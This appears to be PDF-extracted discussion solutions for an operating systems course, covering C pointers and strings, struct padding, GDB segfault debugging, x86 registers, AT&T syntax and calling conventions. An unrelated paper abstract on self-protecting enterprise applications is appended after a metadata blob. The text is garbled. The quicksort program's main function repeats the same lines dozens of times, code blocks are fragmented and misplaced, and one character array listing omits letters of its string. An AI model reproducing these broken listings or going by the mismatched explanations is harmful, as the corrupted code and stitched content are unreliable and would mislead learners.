3. Set breakpoints using break <linenum>. You can also break at functions by using break <func>.
4. Run program with run. If the program takes in arguments, pass in those (i.e. run arg1 arg2).
5. Once you hit your breakpoint, examine using `print`. Other commands like `display`, `watch`, and `set`, and many more will come in handy. You can also step line by line using `next`.
While you don’t have to memorize all the GDB commands, you’ll grow familiar with them the more you use them. When looking for certain functionality, check out the GDB User Manual¹.
### 1.1 Concept Check
1. Consider a valid double pointer `char** dbl_char` in a 32-bit system. What is `sizeof(*dbl_char)`?
4. `dbl_char` is a double pointer, so dereferencing it once will still give a pointer. A 32-bit system means memory addresses will be 32 bits or equivalently 4 bytes.
2. Consider strings initialized as
```c
char* a = "162 is the best";
char b[] = "162 is the best";
``
Are `a` and `b` different?
Yes. Since it’s defined as a literal, `a` points to a string literal in a read only section of memory. On the other hand, `b` resides on the stack. It is equivalent to declaring
```c
char b[] = {'1', '6', '2', ' ', 'i', 's', 't', 'e', 'b', 'e', 's', 't', 0};
```
3. Suppose you have an integer array `int nums[3] = {152, 161, 162}`. What are the differences between `nums`, `&nums`, and `&nums[0]`?
The three will all return memory address that are equivalent to each other. However, there is a subtle difference in that `nums` and `&nums[0]` point to the first element (i.e. an integer), while `&nums` points to the entire array (i.e. an array of integers). As a result, if you increment each of them by one, `nums` and `&nums[0]` will be incremented by `sizeof(int)`, while `&nums` will be incremented by `3 * sizeof(int)`.
### 1.2 Headers
```c
#include <stdio.h>
#include "lib.h"
int main(int argc, char** argv) {
helper_args_t helper_args;
helper_args.string = argv[0];
helper_args.target = '/';
char* result = helper_func(&helper_args);
printf("%s\n", result);
return 0;
}
```
```
#include <stdio.h>
#include "lib.h"
typedef struct helper_args {
char* aux;
char string;
char target;
} helper_args_t;
char* helper_func(helper_args_t* args) {
int i;
for (i = 0; args->string[i] != '\0'; i++)
if (args->string[i] == args->target)
return &args->string[i + 1];
return &args->string;
app.c
```
1. ¶https://sourceware.org/gdb/current/onlinedocs/gdb/
You build the program on a 64-bit machine as follows.
> gcc -c app.c -o app.o
> gcc -c lib.c -o lib.o
> gcc app.o lib.o -o app
1. What is the size of a `helper_args_t` struct?
16 bytes. Since `ABC` is not defined, there is only `char* string` and `char target`, which is a total of $8 + 1 = 9$ bytes. However, GCC pads the structure for alignment, so it fills in the remaining 7 bytes after `char target`.
2. Suppose you add `#define ABC` at the top of `lib.h`. What is the size of a `helper_args_t` struct?
24 bytes. Now that `ABC` is defined, there’s an additional 8 bytes from `char* aux`.
3. Suppose we build the program in a different way with the original files (i.e. none of the changes from previous question apply).
> gcc -DABC -c app.c -o app.o
> gcc -c lib.c -o lib.o
> gcc app.o lib.o -o app
The program will now exhibit undefined behavior. What is the issue?
`app.c` is compiled with `ABC` defined (as seen from the `-DABC` flag), but `lib.c` is compiled without it. As a result, they have differing definitions of `helper_args_t`. In `main`, `argv[0]` is put in to address of `helper_args` + 8 bytes since `app.c` was compiled with `char* aux` member, making `char* string` member be 8 bytes offset from `args`. However, in `helper_func`, the program will access the address of `args` when it accesses `args->string` since it was compiled without `char* aux` member, making `char* string` the first member. This leads to undefined behavior since `char* aux` was never initialized in `main`, so it contains garbage value.
An important observation is that this won’t always lead to a segfault. The value in `char* aux` member is garbage, meaning it could potentially be a non-illegal memory access by complete chance.
### 1.3 Debugging Segmentation Faults
Observe the following program from `singer.c` which aims to sort a string using quicksort. The program will use a string provided as the argument or defaults to "IU is the best singer!" if none is provided.
When the program is compiled and run, we get the output on the right. Use GDB to fix the issue.
```c
void swap(char* a, int i, int j) {
char t = a[i];
a[i] = a[j];
a[j] = t;
}
int partition(char* a, int l, int r){
// code
}
```
> ./singer "Taeyeon is the best singer!"
Unsorted: "Taeyeon is the best singer!"
Sorted : " !Tabeeeeeghiinnorssstty"
> ./singer "IU is the best singer!"
Unsorted: "IU is the best singer!"
Segmentation fault (core dumped)
int pivot = a[l];
int i = l, j = r+1;
while (1) {
do
++i;
while (a[i] <= pivot && i <= r);
do
--j;
while (a[j] > pivot);
if (i >= j)
break;
swap(a, i, j);
}
swap(a, l, j);
return j;
void sort(char* a, int l, int r){
if (l < r){
int j = partition(a, l, r);
sort(a, l, j-1);
sort(a, j+1, r);
}
}
int main(int argc, char** argv){
char* a = NULL;
if (argc > 1)
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!";
printf("Unsorted: \\
a = argv[1];
else
a = "IU is the best singer!"
1. We want to debug the program using GDB. How should we compile the program?
gcc -g singer.c -o singer. We need a -g flag for debugging information. The -o simply controls the name of the executable that is created which defaults to a.out if not specified.
2. When running the program without any arguments (i.e. using the default argument), what line does the segfault happen? Describe the memory operations happening in that line.
First, we compile the program using the command from the previous problem.
> gcc -g singer.c -o singer
The first step in debugging a segfault is seeing which line it occurred in. You can get to the line by letting the program run until it encounters the fault. To get a more holistic view, you can also get the backtrace of the error using `backtrace`.
```bash
> gdb singer
(gdb) run
Starting program: /home/runner/intro/singer
Unsorted: "IU is the best char!"
```
Program received signal SIGSEGV, Segmentation fault.
0x00005646308006c8 in swap (a=0x564630800904 "IU is the best singer!", i=1, j =21)
at singer.c:6
6 a[i] = a[j];
(gdb) backtrace
#0 0x00005646308006c8 in swap (a=0x564630800904 "IU is the best singer!", i =1, j=21)
at singer.c:6
#1 0x0000564630800773 in partition (a=0x564630800904 "IU is the best singer!", l =0, r=21)
at singer.c:26
#2 0x00005646308007bd in sort (a=0x564630800904 "IU is the best singer!", l =0, r=21)
at singer.c:36
#3 0x0000564630800861 in main (argc=1, argv=0x7ffd04ac7098) at singer.c:51
This tells us the segfault occurred on line 6 in `partition` function, which is `a[i] = a[j]`. This line performs two memory operations: a read from `a[j]` and a write to `a[i]`.
When running on Replit, you may get a warning "warning: Error disabling address space randomization: Operation not permitted". Feel free to ignore this as this is a limitation from Replit.
3. Run the program with and without an argument and observe the memory address of `a` in the segfaulting line. Why are the memory addresses so different?
Using GDB, break at line 6 where the segfault occurs.
```bash
> gdb singer
(gdb) break 6
Breakpoint 1 at 0x6ab: file singer.c, line 6.
(gdb) run
Starting program: /home/runner/intro/singer
Unsorted: "IU is the best singer!"
```
Breakpoint 1, swap (
a=0x5624e4600904 "IU is the best singer!", i=1, j=21)
at singer.c:6
6 a[i] = a[j];
(gdb) print a
$1 = 0x5624e4600904 "IU is the best singer!"
(gdb) run "Taeyeon is the best singer!"
The program being debugged has been started already.
4. How should the code be changed to fix the segfault?
The segfaulting line occurs in the `swap` function which is called by `partition` in lines 26 and 29. However, notice that the read from `a[j]` is not a problem as the same read is performed in line 21. As a result, this indicates that a write to `a[i]` is the issue.
This lines up with our observations from the previous question. Since the data is in a read-only segment, it makes sense that the program cannot write to it. As a result, we need to move the initial string to somewhere else on the address space (e.g. heap). To do this, we need to allocate the appropriate amount of space and then copy over the string. This could be accomplished with a `malloc` followed by a `strcpy`, or `strdup` which does the same thing.
Replacing line 48 with `a = strdup("IU is the best char!")` will fix the segfault. You might say that we should free `a` since it’ll be allocated on the heap. However, this isn’t necessary as the last line `a` is used is line 52, which is also the last line of the program.
---
2 x86
x86 is a family of instruction set architectures (ISA) developed by Intel. Unlike RISC-V from CS 61C, x86 is based on the complex instruction set computer (CISC) architecture. x86 being a family of ISAs means there are a variety of different dialects of this language. In this class, we will focus on the 32-bit ISA called IA-32 or i386 which is the common denominator for all 32-bit x86 processors and hence used in Pintos. While heavily related, this should not be confused with the 32-bit microprocessor i386, also known as Intel 80386). However, we will still occasionally mention the 64-bit ISA x86-64 as you may come across during some non-Pintos assignments.
Registers
Registers are small storage spaces directly on the processor, allowing for fast memory access.
Recall from CS 61C that RISC-V had 31 general purpose registers (GPR) x0 - x31 with appropriate ABI names (e.g. x2 = sp for stack pointer). Due to architectural differences, x86 only has 8 GPRs.
<table>
<thead>
<tr>
<th>Register</th>
<th>Name</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td>ax</td>
<td>Accumulator</td>
<td>I/O port access, arithmetic, interrupt calls</td>
</tr>
<tr>
<td>bx</td>
<td>Base</td>
<td>Base pointer for memory access</td>
</tr>
<tr>
<td>cx</td>
<td>Counter</td>
<td>Loop counting, bit shifts</td>
</tr>
<tr>
<td>dx</td>
<td>Data</td>
<td>I/O port access, arithmetic, interrupt calls</td>
</tr>
<tr>
<td>sp</td>
<td>Stack Pointer</td>
<td>Top address of stack</td>
</tr>
<tr>
<td>bp</td>
<td>Base Pointer</td>
<td>Base address of stack</td>
</tr>
<tr>
<td>si</td>
<td>Source Index</td>
<td>Source for stream operations (e.g. string)</td>
</tr>
<tr>
<td>di</td>
<td>Destination Index</td>
<td>Destination for stream operations (e.g. string)</td>
</tr>
</tbody>
</table>
Due to x86’s 16-bit history, the GPRs started as 16-bits and were extended to 32-bits with the e prefix (e.g. eax for ax) and 64-bits with the r prefix (e.g. rax for ax). Each 16-bit GPR can be addressed by the 8-bit LSB (i.e. lower 8 bits) by replacing the last letter with l (e.g. al for ax). ax, cx, dx, and bx can also be addressed by the 8-bit MSB (i.e. higher 8 bits) by replacing the last letter with h (e.g. ah for ax).
Akin to the program counter register pc from RISC-V, x86 has an instruction pointer register ip. Like the GPRs, it is extended to 32-bits with the e prefix and 64-bits with r prefix. ip is a special register since it cannot be read and modified like a GPR (i.e. cannot use vanilla memory instructions).
There are other registers such as segment, EFLAGS, control, debug, test, floating point and many more. However, the GPRs and the instruction pointer register are the main ones you will work with in this class.
Syntax
Although IA-32 specifies the registers and instructions, there are two different syntaxes: Intel and AT&T. In this class, we will use the AT&T syntax because it is used by the GNU Assembler, the assembler for GCC and thus the standard for Pintos and most Unix-like operating systems like Linux. The two syntaxes have significant differences, so make sure to check which syntax is being used when referencing documentation.
Registers are preceded by a percent sign (e.g. %eax for eax). immediates such as constants are preceded by a dollar sign (e.g. $162 for the constant 162).
The general structure of a line of code is inst src, dest. For example, $movl %ebx, %eax will move the contents of %ebx into %eax.
Addressing memory uses the synax of offset(base, index, scale) where base and index are registers, and offset and scale are integers (scale can only take on values of 1, 2, 4, or 8). This accesses the data at memory address base + index * scale + offset. All parameters are optional, though most cases you will see will have base and offset. scale The following are some use cases of addressing memory with different instructions.
mov 8(%ebx), %eax | Move contents from the address ebx + 8 into eax
mov %ecx, -4(%esi, %ebx, 8) | Move contents in ecx into address esi + 8 * ebx - 4
One exception to the above syntax is when using the *lea* instruction which stands for "load effective address". *lea* operates directly on the memory addresses themselves and not the contents contained in the memory addresses. For instance, *lea* 8(%ebx), %eax would put the address ebx + 8 into eax, not the contents at that address.
Each instruction also has a suffix that signifies the operand size. *b* means byte (8 bits), *w* means word (16 bits), and *l* means long (32 bits). These are used when the the intended data size is ambiguous (e.g. *mov* $0, (%esp)).
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>movb $0, (%esp)</td>
<td>Zero out a single byte from the stack pointer</td>
</tr>
<tr>
<td>movw $0, (%esp)</td>
<td>Zero out two bytes from the stack pointer</td>
</tr>
<tr>
<td>movl $0, (%esp)</td>
<td>Zero out four bytes from the stack pointer</td>
</tr>
</tbody>
</table>
The suffixes aren’t always necessary when the intended data size can be inferred in some cases (e.g. using a 32-bit register as an operand means a 32-bit operation), but it is good practice to use them regardless.
A key difference of x86 from RISC-V is how much one instruction accomplishes due to its complicated instruction set. For instance, let’s examine
### Calling Convention
**Calling convention** is a procedure for how to call and return from functions. They specify stack management, passing in parameters, any registers that need to be saved, stack management, returning values, and more. There are two sets of rules: one for the caller of the function and one for the callee of the function.
Calling conventions are heavily tied into the language that’s being compiled. In this class, we will use the calling convention defined by the i386 System V ABI as the default calling convention.
#### Caller
Before calling the function (i.e. prologue), the caller needs to
1. Save caller-saved GPRs (EAX, ECX, EDX) onto the stack *if needed after the function call*.
2. Push parameters onto the stack in reverse order (i.e. store first parameter at the lowest address). Add necessary padding *before the parameters* to ensure a 16-byte alignment.
Then the caller calls the function by pushing the return address onto the stack and jumping to the function. Once the function call returns (i.e. epilogue), the caller needs to
1. Remove the parameters from the stack.
2. Restore caller-saved GPRs (if any) from the prologue.
#### Callee
Before executing any function logic (i.e. prologue), the callee needs to
1. Push EBP onto the stack and set ebp to be the new esp (i.e. stack pointer after pushing the ebp). This marks the start of a new stack frame.
2. Allocate stack space for any local variables (i.e. decrement esp).
3. Save callee-saved GPRs (ebx, edi, esi) onto the stack if used during the function call.
Then the callee performs the function logic. Before returning (i.e. epilogue), the callee needs too
1. Store the return value in eax.
2. Restore callee-saved GPRs (if any) from the prologue.
3. Deallocate local variables. While subtracting the correct amount will technically work, a less error prone way is to set esp to be the current ebp, effectively clearing the stack frame.
4. Restore caller’s ebp from the stack.
5. Return from the function by popping the return address pushed by the caller in its prologue and jumping to it.
**Instructions**
There are a few commonly used instructions that will show up in nearly every assembly code due to the calling convention.
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Purpose</th>
<th>Effective</th>
</tr>
</thead>
</table>
| pushl src | Push src onto stack | subl $4, %esp
| | movl src, (%esp) |
| popl dest | Pop from stack into dest | movl (%esp), dest |
| | | addl $4, %esp |
| call addr | Push return address onto stack and jump to addr | pushl %eip
| | jump addr
| | movl %ebp, %esp |
| leave | Restore EBP and ESP to previous stack frame | popl %ebp
| | popl %eip |
| ret | Pop return address from stack and jump to it | |
Keep in mind the effective column shows what the instruction is doing, but it may not exactly be what the processor does. In fact, `call` and `ret` access EIP directly using `mov` which is not allowed.
**Optimizations**
When compiling with some optimizations using GCC (e.g. `O3` flag), you may notice some violations of these calling conventions, most notably the saving of the base pointer. This is because the base pointer is not a necessity: the stack pointer is sufficient to address anything we need. Even when using RISC-V, the equivalent frame pointer was not saved during calling convention.
Another notable omission is the 16-byte stack alignment which GCC omits by default even without any optimizations. As a result, you will need to specify the `-fno-ipa-stack-alignment` flag when compiling to get the necessary 16-byte alignment.
**2.1 Concept Check**
1. Between SP and BP, which has a higher memory address?
**bp** has a higher memory address. The stack grows downwards, meaning the top of the stack moves towards lower addresses.
2. Based on the differences of RISC and CISC, why might x86 have less GPRs compared to RISC-V?
The reduced instruction set of RISC-V means the processor requires less hardware space for transistors, leaving more room for GPRs.
3. Write three different ways to clear the `eax` register (i.e. store a 0).
4. True or False: Right before the caller jumps to the desired function, the stack must be 16-byte aligned.
False. The stack needs to be 16-byte aligned right after the parameters have been pushed onto the stack. Return address is pushed right before jumping.
2.2 Reverse Engineering
A Pythagorean triplet $a < b < c$ satisfies the property $a^2 + b^2 = c^2$. \texttt{triplet.s} on the right returns the product of a Pythagorean triplet for which $a + b + c = 1000$. \texttt{triplet.s} has been assembled without optimizations based on a complete version of \texttt{triplet.c} given on the left. Unused labels and directives have been omitted in \texttt{triplet.s} for simplicity.
1. What is the memory address of \( a \) relative to the base pointer?
\texttt{triplet.c} shows that \( a \) is defined to be a value of 1. In line 5 of \texttt{triplet.s}, we see a local variable being defined on the stack with the constant 1. Since \( a \) is the first variable that needs to be defined in the code, line 5 must correspond to \( a \), meaning \( a \) is defined at \( \text{EBP} - 4 \) (i.e. four bytes below the base pointer).
2. What is the end condition for the outer loop using \( a \)?
After \( a \) is defined on line 7, we jump to .L2 in line 8. This brings us to line 43 where we compare \( a \) (i.e. \( -4(%ebp) \)) with 333 using the \texttt{cmp} instruction, which subtracts \( a \) from 333. In line 44, we jump if 333 - \( a \) is less than 0 to .L7. Otherwise, we proceed with the rest of the code which loads 0 into \( \text{eax} \) and performs a return procedure by executing .L5. Therefore, \( a \) must be less than or equal to 333.
3. What are the memory addresses of the rest of the local variables \((a2, b, b2, c, c2)\) relative to the base pointer?
Since the code is unoptimized, we trace the code with the appropriate jumps to see where each local variable is defined.
After \( a \) is defined, we jump to .L7 where we see in line 12 that \( a2 \) is the next variable defined at \( \text{EBP} - 12 \). Afterwards, \( b \) is defined at \( \text{EBP} - 8 \) in line 14. This is confirmed by the similar loop structure as the code jumps to .L3 where \texttt{cmp} and \texttt{jle} exists as seen for \( a \).
The code then jumps to .L6 where \( b2, c, \) and \( c2 \) are defined at 16, 20, and 24 bytes below the base pointer in lines 19, 23, and 26, respectively.
The stack viewed from the current base pointer looks like
\[
\begin{array}{c}
\text{ebp} \\
a \\
b \\
a2 \\
b2 \\
c \\
\end{array}
\]
An important observation is how local variables are not always placed on the stack in the order they are defined in, so it’s important to not make such an assumption and instead trace the code. This is due to GCC’s stack slot assignment optimizations\(^*\) (not in scope).
4. Fill in the missing code for \texttt{triplet.c}.
```c
int main(void) {
for (int a = 1; a <= 333; a++) {
int a2 = a * a;
for (int b = a; b <= 666; b++) {
int b2 = b * b;
int c = 1000 - a - b;
int c2 = c * c;
if (a2 + b2 == c2) {
return a * b * c;
}
}
}
return 0;
}
```
triplet.c
A breakdown of how this code was compiled can be found on this Compiler Explorer snippet which highlights corresponding lines between C and x86 and shows the exact compiler flags used. Feel free to play around with different optimizations and other compiler flags to see how the corresponding x86 code changes.
### 2.3 Stack Frame
```c
int p = 0;
int bar(int x, int y, int z) {
int w = x + y - z;
return w + 1;
}
void foo(int a, int b) {
p = a + b + bar(3, 4, 5);
}
```
foobar.c
```c
void bar(int x, int y, int z) {
int w = x + y - z;
return w + 1;
}
```
1. Which lines of the code correspond to a caller/callee prologue/epilogue?
The most apparent caller/callee pair is `foo`/`bar`. Lines 24-27 are the prologue of the caller that setup the arguments. Line 29 is the epilogue of the caller that cleans up the stack by simply moving up the stack pointer. Lines 4-6 are the prologue of the callee that push the base pointer and make room for local variables. While there’s only one local variable `w` in `bar`, the compiler still makes room for 16 bytes due to the default stack boundary of 16 bytes per GCC's `--mpreferred-stack-boundary` flag. Lines 13-15 are the epilogue of the callee that restores the stack pointer and returns back to the caller.
It’s important to recognize `foo` is a function as well, meaning it will be in the callee position when it’s called by another function. Similar to when `bar` was the caller, lines 17-20 and lines 33-35 serve as the prologue and epilogue respectively when `foo` is the callee.
2. What does line 19 do in `call.s`? Why is it necessary?
Line 19 saves the EBX register by pushing it onto the stack. EBX is a callee-saved register, so `foo` is responsible for saving it before using it.
3. Why is EDX not saved by `foo` before calling `bar` despite being used in `bar`?
GPRS are saved only if the register content needs to persist after the function call. EDX was used as a temporary register for computation in lines 21-23. As a result, its value does not need to persist past the call of `bar`.
4. Draw the stack frame and contents of relevant registers after executing line 13 of `call.s`.
---
*https://gcc.gnu.org/onlinedocs/gcc-4.2.4/gcc/i386-and-x86_002d64-Options.html*
ESP points to the bottom of the stack. EBP points to the “EBP of foo”. EAX holds 3, EBX holds \(a + b\), and EDX holds 3.
|
{"Source-Url": "https://inst.eecs.berkeley.edu/~cs162/sp22/static/dis/0_sol.pdf", "len_cl100k_base": 9277, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 38466, "total-output-tokens": 10724, "length": "2e13", "weborganizer": {"__label__adult": 0.0003218650817871094, "__label__art_design": 0.0003063678741455078, "__label__crime_law": 0.00016772747039794922, "__label__education_jobs": 0.00027298927307128906, "__label__entertainment": 6.943941116333008e-05, "__label__fashion_beauty": 0.0001304149627685547, "__label__finance_business": 9.721517562866212e-05, "__label__food_dining": 0.0003859996795654297, "__label__games": 0.0008144378662109375, "__label__hardware": 0.002552032470703125, "__label__health": 0.0002294778823852539, "__label__history": 0.0002117156982421875, "__label__home_hobbies": 0.00013053417205810547, "__label__industrial": 0.00042819976806640625, "__label__literature": 0.00018644332885742188, "__label__politics": 0.00014340877532958984, "__label__religion": 0.0004258155822753906, "__label__science_tech": 0.00974273681640625, "__label__social_life": 5.227327346801758e-05, "__label__software": 0.005706787109375, "__label__software_dev": 0.9765625, "__label__sports_fitness": 0.0002689361572265625, "__label__transportation": 0.00040531158447265625, "__label__travel": 0.00020301342010498047}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33839, 0.01908]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33839, 0.61395]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33839, 0.84493]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 3053, false], [3053, 5391, null], [5391, 7847, null], [7847, 15546, null], [15546, 17493, null], [17493, 18667, null], [18667, 22433, null], [22433, 25536, null], [25536, 28159, null], [28159, 28843, null], [28843, 31117, null], [31117, 32039, null], [32039, 33718, null], [33718, 33839, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 3053, true], [3053, 5391, null], [5391, 7847, null], [7847, 15546, null], [15546, 17493, null], [17493, 18667, null], [18667, 22433, null], [22433, 25536, null], [25536, 28159, null], [28159, 28843, null], [28843, 31117, null], [31117, 32039, null], [32039, 33718, null], [33718, 33839, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33839, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33839, null]], "pdf_page_numbers": [[0, 0, 1], [0, 3053, 2], [3053, 5391, 3], [5391, 7847, 4], [7847, 15546, 5], [15546, 17493, 6], [17493, 18667, 7], [18667, 22433, 8], [22433, 25536, 9], [25536, 28159, 10], [28159, 28843, 11], [28843, 31117, 12], [31117, 32039, 13], [32039, 33718, 14], [33718, 33839, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33839, 0.04622]]}
|
olmocr_science_pdfs
|
2024-12-01
|
2024-12-01
|
2cdf53c785b7b746b5164be8e980e357e09556cc
|
Towards Self-Protecting Enterprise Applications
Davide Lorenzoli, Leonardo Mariani, and Mauro Pezzè
Università degli Studi di Milano Bicocca
via Bicocca degli Arcimboldi, 8
20126 Milano, Italy
{lorenzoli,mariani,pezze}@disco.unimib.it
Abstract
Enterprise systems must guarantee high availability and reliability to provide 24/7 services without interruptions and failures. Mechanisms for handling exceptional cases and implementing fault tolerance techniques can reduce failure occurrences, and increase dependability. Most of such mechanisms address major problems that lead to unexpected service termination or crashes, but do not deal with many subtle domain dependent failures that do not necessarily cause service termination or crashes, but result in incorrect results.
In this paper, we propose a technique for developing self-protecting systems. The technique proposed in this paper observes values at relevant program points. When the technique detects a software failure, it uses the collected information to identify the execution contexts that lead to the failure, and automatically enables mechanisms for preventing future occurrences of failures of the same type. Thus, failures do not occur again after the first detection of a failure of the same type.
1 Introduction
Enterprise systems are long living applications that integrate persistent and transaction-based services to offer core business functionalities to large populations of users who continuously access enterprise applications to meet relevant business objectives [8]. Dependability properties, such as availability, safety and reliability, are essential quality attributes, and enterprise systems are thoroughly tested throughout all development phases, from system design to deployment, to verify the satisfaction of such essential properties. However because of the complexity of these systems, faults cannot be completely eliminated from deployed applications [3]. Due to the continuous accesses from many users, failures can be experienced repeatedly before identifying the responsible faults and before developing, testing and deploying suitable patches. Failure prevention techniques aim at mitigating the problem of recurrent failures by protecting systems from failure occurrences, while waiting for faults to be identified and removed.
Failure prevention techniques can be roughly classified as failure-specific and general techniques. Failure specific techniques are based on design-time prediction of failures that are likely to occur at run-time, and on the design of mechanisms to protect the system from the occurrence of the predicted failures. Common failure specific techniques are exception handling and defensive programming [21, 29]. We can for example design exception handlers to manage accesses to non-existing file, even if such events should not happen. Failure-specific techniques can capture a limited subset of potential faults, but do not protect from problems that are not predicted and handled at design-time.
General techniques are based on mechanisms that handle catastrophic events that do not depend on the specific application, such as transactional services and fault-tolerance mechanisms [25, 1]. Fault tolerance mechanisms can for example automatically hide single algorithmic faults by repli-
cating computations. General techniques do not require predicting the exact cause of failures, but are mostly limited to domain independent failures, such as system crashes and hardware failures.
